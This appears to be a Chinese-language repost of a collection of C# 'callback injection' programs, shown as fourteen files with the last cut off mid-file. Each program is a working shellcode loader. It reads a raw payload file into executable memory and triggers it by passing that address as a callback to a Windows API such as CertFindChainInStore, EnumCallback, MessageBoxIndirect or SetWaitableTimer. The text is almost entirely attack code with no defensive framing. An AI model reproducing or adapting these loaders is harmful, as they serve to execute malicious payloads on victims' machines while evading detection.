回调函数注入(Callback Injection)实例汇总
由于篇幅原因可以从gzh获取完整内容和下载链接:
回调函数注入(Callback Injection)实例汇总--50/91
1.回调函数注入 (C#) 通过 CertFindChainInStore
1// Wra7h\FlavorTown2// Compile: Visual Studio 2022 & .NET Fx 3.5+34using System;5using System.Diagnostics;6using System.Runtime.InteropServices;78namespace CertFindChainInStore9{10 internal class Program11 {12 static void Main(string[] args)13 {14 if (args.Length < 1)15 {16 Console.WriteLine("\nNo shellcode specified.");17 Console.WriteLine("Example Usage: CertFindChainInStore.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");18 System.Environment.Exit(1);19 }2021 byte[] payload = System.IO.File.ReadAllBytes(args[0]);2223 IntPtr hAlloc = VirtualAlloc(24 IntPtr.Zero,25 (uint)payload.Length,26 0x1000 /*COMMIT*/,27 0x40 /*RWX*/);2829 Marshal.Copy(payload, 0, hAlloc, payload.Length);3031 uint oldProtect;32 VirtualProtectEx(33 Process.GetCurrentProcess().Handle,34 hAlloc,35 payload.Length,36 0x20, //RX37 out oldProtect);3839 IntPtr hCertStore = CertOpenSystemStore(0, "MY");4041 CERT_CHAIN_FIND_BY_ISSUER_PARA sCCFIP = new CERT_CHAIN_FIND_BY_ISSUER_PARA();42 sCCFIP.pfnFindCallback = hAlloc;43 sCCFIP.cbSize = (uint)Marshal.SizeOf(sCCFIP);4445 CertFindChainInStore(46 hCertStore,47 0x1,48 0,49 1,50 ref sCCFIP,51 IntPtr.Zero);5253 //Cleanup54 CertCloseStore(hCertStore, 0);55 }5657 [DllImport("kernel32")]58 static extern IntPtr VirtualAlloc(59 IntPtr lpAddress,60 uint dwSize,61 uint flAllocationType,62 uint flProtect);6364 [DllImport("kernel32.dll")]65 static extern bool VirtualProtectEx(66 IntPtr hProcess,67 IntPtr lpAddress,68 int dwSize,69 uint flNewProtect,70 out uint lpflOldProtect);7172 [DllImport("crypt32.dll", CharSet = CharSet.Unicode)]73 public static extern IntPtr CertOpenSystemStore(74 uint hProv,75 String szSubsystemProtocol76 );7778 [DllImport("crypt32.dll", SetLastError = true)]79 public static extern IntPtr CertFindChainInStore(80 IntPtr hCertStore,81 uint dwCertEncodingType,82 uint dwFindFlags,83 uint dwFindType,84 ref CERT_CHAIN_FIND_BY_ISSUER_PARA pvFindPara,85 IntPtr pPrevChainContext);8687 [DllImport("crypt32.dll", SetLastError = true)]88 public static extern bool CertCloseStore(IntPtr storeProvider, int flags);8990 public struct CERT_CHAIN_FIND_BY_ISSUER_PARA91 {92 public uint cbSize;93 public string pszUsageIdentifier;94 public uint dwKeySpec;95 public uint dwAcquirePrivateKeyFlags;96 public uint cIssuer;97 public IntPtr rgIssuer;98 public IntPtr pfnFindCallback;99 public IntPtr pvFindArg;
100 public uint dwIssuerChainIndex;
101 public uint dwIssuerElementIndex;
102 }
103 }
104}
2.回调函数注入 (C#) 通过 CopyFileTransacted
1// Wra7h\FlavorTown2// Compile: Visual Studio 2022 & .NET Fx 3.5+34using System;5using System.Diagnostics;6using System.Runtime.InteropServices;78namespace CopyFileTransacted9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: CopyFileTransacted.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(Process.GetCurrentProcess().Handle, hAlloc,
33 payload.Length, 0x20/*RX*/, out oldProtect);
34
35 string szTempFile = System.IO.Path.GetTempFileName();
36
37 IntPtr hTransaction = CreateTransaction(IntPtr.Zero, IntPtr.Zero, 0, 0, 0, 0, string.Empty);
38 CopyFileTransacted(@"C:\Windows\notepad.exe", szTempFile, hAlloc, IntPtr.Zero, 0, 0x0, hTransaction);
39
40 //Cleanup
41 System.IO.File.Delete(szTempFile);
42 CloseHandle(hTransaction);
43 }
44
45 [DllImport("kernel32")]
46 static extern IntPtr VirtualAlloc(
47 IntPtr lpAddress,
48 uint dwSize,
49 uint flAllocationType,
50 uint flProtect);
51
52 [DllImport("kernel32.dll")]
53 static extern bool VirtualProtectEx(
54 IntPtr hProcess,
55 IntPtr lpAddress,
56 int dwSize,
57 uint flNewProtect,
58 out uint lpflOldProtect);
59
60 [DllImport("KtmW32.dll")]
61 static extern IntPtr CreateTransaction(IntPtr lpTransactionAttributes, IntPtr UOW, uint CreateOptions, uint IsolationLevel, uint IsolationFlags, uint Timeout, string Description);
62
63 [DllImport("kernel32.dll")]
64 static extern bool CopyFileTransacted(string lpExistingFileName, string lpNewFileName,
65 IntPtr lpProgressRoutine, IntPtr lpData, Int32 pbCancel,
66 uint dwCopyFlags, IntPtr hTransaction);
67
68 [DllImport("kernel32.dll")]
69 static extern bool CloseHandle(IntPtr hObject);
70 }
71}
3.回调函数注入 (C#) 通过 DSA_EnumCallback
1// Wra7h\FlavorTown2// Compile: Visual Studio 2022 & .NET Fx 3.5+34using System;5using System.Diagnostics;6using System.Runtime.InteropServices;78namespace DSA_EnumCallback9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: DSA_EnumCallback.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 IntPtr hDSA = DSA_Create(1, 1);
40
41 DSA_InsertItem(hDSA, 0x7fffffff, hDSA); //Append
42
43 DSA_EnumCallback(hDSA, hAlloc, IntPtr.Zero);
44
45 DSA_Destroy(hDSA);
46 }
47
48 [DllImport("kernel32")]
49 static extern IntPtr VirtualAlloc(
50 IntPtr lpAddress,
51 uint dwSize,
52 uint flAllocationType,
53 uint flProtect);
54
55 [DllImport("kernel32.dll")]
56 static extern bool VirtualProtectEx(
57 IntPtr hProcess,
58 IntPtr lpAddress,
59 int dwSize,
60 uint flNewProtect,
61 out uint lpflOldProtect);
62
63 [DllImport("Comctl32.dll")]
64 static extern IntPtr DSA_Create(
65 int cbItem,
66 int cItemGrow);
67
68 [DllImport("Comctl32.dll")]
69 static extern void DSA_InsertItem(
70 IntPtr hdsa,
71 int i,
72 IntPtr pItem);
73
74 [DllImport("Comctl32.dll")]
75 static extern void DSA_EnumCallback(
76 IntPtr hdsa,
77 IntPtr pfnCB,
78 IntPtr pData);
79
80 [DllImport("Comctl32.dll")]
81 static extern bool DSA_Destroy(IntPtr hdsa);
82 }
83}
4.回调函数注入 (C#) 通过 EncryptedFileRaw
1// Wra7h\FlavorTown2// Compile: Visual Studio 2022 & .NET Fx 3.5+34using System;5using System.Diagnostics;6using System.Runtime.InteropServices;78namespace EncryptedFileRaw9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: EncryptedFileRaw.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 IntPtr pvContext = IntPtr.Zero;
40 ulong CREATE_FOR_IMPORT = 1;
41 OpenEncryptedFileRaw(System.IO.Path.GetTempFileName(), CREATE_FOR_IMPORT, out pvContext);
42 WriteEncryptedFileRaw(hAlloc, IntPtr.Zero, pvContext);
43 }
44
45 [DllImport("kernel32")]
46 public static extern IntPtr VirtualAlloc(
47 IntPtr lpAddress,
48 uint dwSize,
49 uint flAllocationType,
50 uint flProtect);
51
52 [DllImport("kernel32.dll")]
53 static extern bool VirtualProtectEx(
54 IntPtr hProcess,
55 IntPtr lpAddress,
56 int dwSize,
57 uint flNewProtect,
58 out uint lpflOldProtect);
59
60 [DllImport("Advapi32.dll")]
61 static extern uint OpenEncryptedFileRaw(
62 string lpFilename,
63 ulong ulFlags,
64 out IntPtr pvContext);
65
66 [DllImport("Advapi32.dll")]
67 static extern uint WriteEncryptedFileRaw(
68 IntPtr pfImportCallback,
69 IntPtr pvCallbackContext,
70 IntPtr pvContext);
71 }
72}
5.回调函数注入 (C#) 通过 EvtSubscribe_CVEEventWrite
1// Wra7h\FlavorTown2// Compile: Visual Studio 2022 & .NET Fx 3.5+34using System;5using System.Diagnostics;6using System.Runtime.InteropServices;78namespace EvtSubscribe_CVEEventWrite9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: EvtSubscribe_CVEEventWrite.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 uint EvtSubscribeToFutureEvents = 1;
40 IntPtr hEvent = EvtSubscribe(IntPtr.Zero, IntPtr.Zero, "Application", "*[System/EventID=1]", IntPtr.Zero, IntPtr.Zero, hAlloc, EvtSubscribeToFutureEvents);
41 long test = CveEventWrite("2022-123456", "Wra7h");
42 System.Threading.Thread.Sleep(10000);
43 EvtClose(hEvent);
44 }
45
46 [DllImport("kernel32")]
47 static extern IntPtr VirtualAlloc(
48 IntPtr lpAddress,
49 uint dwSize,
50 uint flAllocationType,
51 uint flProtect);
52
53 [DllImport("kernel32.dll")]
54 static extern bool VirtualProtectEx(
55 IntPtr hProcess,
56 IntPtr lpAddress,
57 int dwSize,
58 uint flNewProtect,
59 out uint lpflOldProtect);
60
61 [DllImport("Wevtapi.dll")]
62 static extern IntPtr EvtSubscribe(
63 IntPtr hSession,
64 IntPtr SignalEvent,
65 [MarshalAs(UnmanagedType.LPWStr)] string ChannelPath,
66 [MarshalAs(UnmanagedType.LPWStr)] string Query,
67 IntPtr Bookmark,
68 IntPtr Context,
69 IntPtr Callback,
70 uint Flags);
71
72 [DllImport("Advapi32.dll")]
73 static extern long CveEventWrite(string CveId, string AdditionalDetails);
74
75 [DllImport("Wevtapi.dll")]
76 static extern bool EvtClose(IntPtr hEvent);
77 }
78}
6.回调函数注入 (C#) 通过 MFAddPeriodicCallback
1// Wra7h\FlavorTown2// Compile: Visual Studio 2022 & .NET Fx 3.5+34using System;5using System.Diagnostics;6using System.Runtime.InteropServices;78namespace MFAddPeriodicCallback9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: MFAddPeriodicCallback.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 MFStartup(0x0002 << 16 | 0x0070, 0x1);
40
41 uint dwKey = 0;
42 MFAddPeriodicCallback(hAlloc, IntPtr.Zero, out dwKey);
43
44 System.Threading.Thread.Sleep(1000);
45
46 MFShutdown();
47
48 }
49
50 [DllImport("kernel32")]
51 static extern IntPtr VirtualAlloc(
52 IntPtr lpAddress,
53 uint dwSize,
54 uint flAllocationType,
55 uint flProtect);
56
57 [DllImport("kernel32.dll")]
58 static extern bool VirtualProtectEx(
59 IntPtr hProcess,
60 IntPtr lpAddress,
61 int dwSize,
62 uint flNewProtect,
63 out uint lpflOldProtect);
64
65 [DllImport("Mfplat.dll", SetLastError = true)]
66 static extern uint MFStartup(
67 ulong Version,
68 uint dwFlags);
69
70 [DllImport("Mfplat.dll", SetLastError = true)]
71 static extern uint MFAddPeriodicCallback(
72 IntPtr Callback,
73 IntPtr pContext,
74 out uint dwKey);
75
76 [DllImport("Mfplat.dll", SetLastError = true)]
77 static extern IntPtr MFShutdown();
78
79 }
80}
7.回调函数注入 (C#) 通过 MessageBoxIndirect
1// Wra7h\FlavorTown2// Compile: Visual Studio 2022 & .NET Fx 3.5+34using System;5using System.IO;6using System.Diagnostics;7using System.Runtime.InteropServices;89namespace MessageBoxIndirect
10{
11 class Program
12 {
13 static void Main(string[] args)
14 {
15 if (args.Length < 1)
16 {
17 Console.WriteLine("\nNo shellcode specified.");
18 Console.WriteLine("Example Usage: MessageBoxIndirect.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
19 System.Environment.Exit(1);
20 }
21
22 byte[] payload = File.ReadAllBytes(args[0]);
23
24 IntPtr hAlloc = VirtualAlloc(
25 IntPtr.Zero,
26 (uint)payload.Length,
27 0x1000 /*COMMIT*/,
28 0x40 /*RWX*/);
29
30 Marshal.Copy(payload, 0, hAlloc, payload.Length);
31
32 uint oldProtect;
33 VirtualProtectEx(
34 Process.GetCurrentProcess().Handle,
35 hAlloc,
36 payload.Length,
37 0x20, //RX
38 out oldProtect);
39
40 MSGBOXPARAMS sMsgBoxParams = new MSGBOXPARAMS();
41 sMsgBoxParams.dwStyle = (uint)(0x00004000L); // Should have an ok button and a help button
42 sMsgBoxParams.lpfnMsgBoxCallback = hAlloc;
43 sMsgBoxParams.lpszText = "Click help for shellcode!";
44 sMsgBoxParams.cbSize = (uint)Marshal.SizeOf(sMsgBoxParams);
45
46 MessageBoxIndirect(sMsgBoxParams);
47 }
48
49 [DllImport("kernel32")]
50 static extern IntPtr VirtualAlloc(
51 IntPtr lpAddress,
52 uint dwSize,
53 uint flAllocationType,
54 uint flProtect);
55
56 [DllImport("kernel32.dll")]
57 static extern bool VirtualProtectEx(
58 IntPtr hProcess,
59 IntPtr lpAddress,
60 int dwSize,
61 uint flNewProtect,
62 out uint lpflOldProtect);
63
64 [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
65 public static extern int MessageBoxIndirect(MSGBOXPARAMS lbmp);
66
67 [StructLayout(LayoutKind.Sequential)]
68 public struct MSGBOXPARAMS
69 {
70 public uint cbSize;
71 public IntPtr hwndOwner;
72 public IntPtr hInstance;
73 [MarshalAs(UnmanagedType.LPWStr)] public string lpszText;
74 [MarshalAs(UnmanagedType.LPWStr)] public string lpszCaption;
75 public uint dwStyle;
76 public IntPtr lpszIcon;
77 public IntPtr dwContextHelpId;
78 public IntPtr lpfnMsgBoxCallback;
79 public uint dwLanguageId;
80 }
81 }
82}
8.回调函数注入 (C#) 通过 NotifyIpInterfaceChange
1// Wra7h\FlavorTown2// Compile: Visual Studio 2022 & .NET Fx 3.5+34using System;5using System.Diagnostics;6using System.Runtime.InteropServices;78namespace NotifyIpInterfaceChange9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: NotifyIpInterfaceChange.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 uint AF_UNSPEC = 0x0;
40 IntPtr hNotification = IntPtr.Zero;
41 NotifyIpInterfaceChange(AF_UNSPEC, hAlloc, IntPtr.Zero, true, ref hNotification);
42 }
43
44 [DllImport("kernel32")]
45 static extern IntPtr VirtualAlloc(
46 IntPtr lpAddress,
47 uint dwSize,
48 uint flAllocationType,
49 uint flProtect);
50
51 [DllImport("kernel32.dll")]
52 static extern bool VirtualProtectEx(
53 IntPtr hProcess,
54 IntPtr lpAddress,
55 int dwSize,
56 uint flNewProtect,
57 out uint lpflOldProtect);
58
59 [DllImport("Iphlpapi.dll")]
60 static extern IntPtr NotifyIpInterfaceChange(
61 uint Family,
62 IntPtr Callback,
63 IntPtr CallerContext,
64 bool InitialNotification,
65 ref IntPtr NotificationHandle);
66
67 }
68}
9.回调函数注入 (C#) 通过 NotifyRouteChange2
1// Wra7h\FlavorTown2// Compile: Visual Studio 2022 & .NET Fx 3.5+34using System;5using System.Diagnostics;6using System.Runtime.InteropServices;78namespace NotifyRouteChange29{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: NotifyRouteChange2.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(Process.GetCurrentProcess().Handle, hAlloc,
33 payload.Length, 0x20/*RX*/, out oldProtect);
34
35 uint AF_INET = 0x2;
36 IntPtr hNotification = IntPtr.Zero;
37 NotifyRouteChange2(AF_INET, hAlloc, IntPtr.Zero, true, ref hNotification);
38 }
39
40 [DllImport("kernel32")]
41 static extern IntPtr VirtualAlloc(
42 IntPtr lpAddress,
43 uint dwSize,
44 uint flAllocationType,
45 uint flProtect);
46
47 [DllImport("kernel32.dll")]
48 static extern bool VirtualProtectEx(
49 IntPtr hProcess,
50 IntPtr lpAddress,
51 int dwSize,
52 uint flNewProtect,
53 out uint lpflOldProtect);
54
55 [DllImport("Iphlpapi.dll")]
56 static extern IntPtr NotifyRouteChange2(
57 uint AddressFamily,
58 IntPtr Callback,
59 IntPtr CallerContext,
60 bool InitialNotification,
61 ref IntPtr NotificationHandle);
62
63 }
64}
10.回调函数注入 (C#) 通过 NotifyTeredoPortChange
1// Wra7h\FlavorTown2// Compile: Visual Studio 2022 & .NET Fx 3.5+34using System;5using System.Diagnostics;6using System.Runtime.InteropServices;78namespace NotifyTeredoPortChange9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: NotifyTeredoPortChange.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(Process.GetCurrentProcess().Handle, hAlloc,
33 payload.Length, 0x20/*RX*/, out oldProtect);
34
35 IntPtr hNotification = IntPtr.Zero;
36 NotifyTeredoPortChange(hAlloc, IntPtr.Zero, true, ref hNotification);
37 }
38
39 [DllImport("kernel32")]
40 static extern IntPtr VirtualAlloc(
41 IntPtr lpAddress,
42 uint dwSize,
43 uint flAllocationType,
44 uint flProtect);
45
46 [DllImport("kernel32.dll")]
47 static extern bool VirtualProtectEx(
48 IntPtr hProcess,
49 IntPtr lpAddress,
50 int dwSize,
51 uint flNewProtect,
52 out uint lpflOldProtect);
53
54 [DllImport("Iphlpapi.dll")]
55 static extern IntPtr NotifyTeredoPortChange(
56 IntPtr Callback,
57 IntPtr CallerContext,
58 bool InitialNotification,
59 ref IntPtr NotificationHandle);
60
61 }
62}
11.回调函数注入 (C#) 通过 NotifyUnicastIpAddressChange
1// Wra7h\FlavorTown2// Compile: Visual Studio 2022 & .NET Fx 3.5+34using System;5using System.Diagnostics;6using System.Runtime.InteropServices;78namespace NotifyUnicastIpAddressChange9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: NotifyUnicastIpAddressChange.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 IntPtr hNotification = IntPtr.Zero;
40 uint AF_INET = 2;
41 NotifyUnicastIpAddressChange(AF_INET, hAlloc, IntPtr.Zero, true, ref hNotification);
42 }
43
44 [DllImport("kernel32")]
45 static extern IntPtr VirtualAlloc(
46 IntPtr lpAddress,
47 uint dwSize,
48 uint flAllocationType,
49 uint flProtect);
50
51 [DllImport("kernel32.dll")]
52 static extern bool VirtualProtectEx(
53 IntPtr hProcess,
54 IntPtr lpAddress,
55 int dwSize,
56 uint flNewProtect,
57 out uint lpflOldProtect);
58
59 [DllImport("Iphlpapi.dll")]
60 static extern IntPtr NotifyUnicastIpAddressChange(
61 uint Family,
62 IntPtr Callback,
63 IntPtr CallerContext,
64 bool InitialNotification,
65 ref IntPtr NotificationHandle);
66 }
67}
12.回调函数注入 (C#) 通过 PerfStartProviderEx
1// Wra7h\FlavorTown2// Compile: Visual Studio 2022 & .NET Fx 3.5+34using System;5using System.Diagnostics;6using System.Runtime.InteropServices;78namespace PerfStartProviderEx9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: PerfStartProviderEx.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 Guid ProviderGuid = Guid.NewGuid();
40
41 PERF_PROVIDER_CONTEXT sPPC = new PERF_PROVIDER_CONTEXT();
42 sPPC.MemAllocRoutine = hAlloc;
43 sPPC.ContextSize = (uint)Marshal.SizeOf(sPPC);
44
45 IntPtr hProvider = IntPtr.Zero;
46 PerfStartProviderEx(ref ProviderGuid, ref sPPC, out hProvider);
47
48 //Close provider handle
49 PerfStopProvider(hProvider);
50 }
51
52 [DllImport("kernel32")]
53 static extern IntPtr VirtualAlloc(
54 IntPtr lpAddress,
55 uint dwSize,
56 uint flAllocationType,
57 uint flProtect);
58
59 [DllImport("kernel32.dll")]
60 static extern bool VirtualProtectEx(
61 IntPtr hProcess,
62 IntPtr lpAddress,
63 int dwSize,
64 uint flNewProtect,
65 out uint lpflOldProtect);
66
67 [DllImport("advapi32.dll")]
68 static extern ulong PerfStartProviderEx(
69 ref Guid ProviderGuid,
70 ref PERF_PROVIDER_CONTEXT ProviderContext,
71 out IntPtr hProvider);
72
73 [DllImport("advapi32.dll")]
74 static extern ulong PerfStopProvider(IntPtr hProvider);
75
76 struct PERF_PROVIDER_CONTEXT
77 {
78 public uint ContextSize;
79 public uint Reserved;
80 public IntPtr ControlCallback;
81 public IntPtr MemAllocRoutine;
82 public IntPtr MemFreeRoutine;
83 public IntPtr pMemContext;
84 }
85
86 }
87}
13.回调函数注入 (C#) 通过 RegisterWaitForSingleObject
1// Wra7h\FlavorTown2// Compile: Visual Studio 2022 & .NET Fx 3.5+34using System;5using System.Diagnostics;6using System.Runtime.InteropServices;78namespace RegisterWaitForSingleObject9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: RegisterWaitForSingleObject.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
21
22 IntPtr hAlloc = VirtualAlloc(
23 IntPtr.Zero,
24 (uint)payload.Length,
25 0x1000 /*COMMIT*/,
26 0x40 /*RWX*/);
27 Marshal.Copy(payload, 0, hAlloc, payload.Length);
28 uint oldProtect;
29 VirtualProtectEx(
30 Process.GetCurrentProcess().Handle,
31 hAlloc,
32 payload.Length,
33 0x20, //RX
34 out oldProtect);
35
36 IntPtr NewWaitObj = IntPtr.Zero;
37 ulong WT_EXECUTEONLYONCE = 0x8;
38 RegisterWaitForSingleObject(out NewWaitObj, Process.GetCurrentProcess().Handle, hAlloc, IntPtr.Zero, 0, WT_EXECUTEONLYONCE);
39 Sleep(1000);
40 }
41
42 [DllImport("kernel32")]
43 public static extern IntPtr VirtualAlloc(
44 IntPtr lpAddress,
45 uint dwSize,
46 uint flAllocationType,
47 uint flProtect);
48
49 [DllImport("kernel32.dll")]
50 static extern bool VirtualProtectEx(
51 IntPtr hProcess,
52 IntPtr lpAddress,
53 int dwSize,
54 uint flNewProtect,
55 out uint lpflOldProtect);
56
57 [DllImport("Kernel32.dll")]
58 static extern IntPtr RegisterWaitForSingleObject(
59 out IntPtr phNewWaitObject,
60 IntPtr hObject,
61 IntPtr Callback,
62 IntPtr Context,
63 ulong dwMilliseconds,
64 ulong dwFlags);
65
66 [DllImport("kernel32")]
67 static extern void Sleep(int milliseconds);
68 }
69}
14.回调函数注入 (C#) 通过 SetWaitableTimer
1// Wra7h\FlavorTown2// Compile: Visual Studio 2022 & .NET Fx 3.5+34using System;5using System.Diagnostics;6using System.Runtime.InteropServices;78namespace SetWaitableTimer9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: SetWaitableTimer.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 IntPtr hTimer = CreateWaitableTimer(IntPtr.Zero, false, string.Empty);
40 LARGE_INTEGER sLI = new LARGE_INTEGER();
41 SetWaitableTimer(hTimer, ref sLI,
42 0, hAlloc, IntPtr.Zero, false);
43
44 SleepEx(1000, true);
45 }
46
47 [DllImport("kernel32")]
48 static extern IntPtr VirtualAlloc(
49 IntPtr lpAddress,
50 uint dwSize,
51 uint flAllocationType,
52 uint flProtect);
53
54 [DllImport("kernel32.dll")]
55 static extern bool VirtualProtectEx(
56 IntPtr hProcess,
57 IntPtr lpAddress,
58 int dwSize,
59 uint flNewProtect,
60 out uint lpflOldProtect);
61
62 [DllImport("kernel32.dll")]
63 static extern IntPtr CreateWaitableTimer(
64 IntPtr lpTimerAttributes,
65 bool bManualReset,
66 string lpTimerName);
67
68 [StructLayout(LayoutKind.Explicit, Size = 8)]
69 struct LARGE_INTEGER
70 {
71 [FieldOffset(0)] public Int64 QuadPart;
72 [FieldOffset(0)] public UInt32 LowPart;
73 [FieldOffset(4)] public Int32 HighPart;
74 }
75
76 [DllImport("kernel32.dll")]
77 static extern bool SetWaitableTimer(IntPtr hTimer,
78 ref LARGE_INTEGER pDueTime,
79 int lPeriod,
80 IntPtr pfnCompletionRoutine,
81 IntPtr lpArgToCompletionRoutine,
82 bool fResume);
83
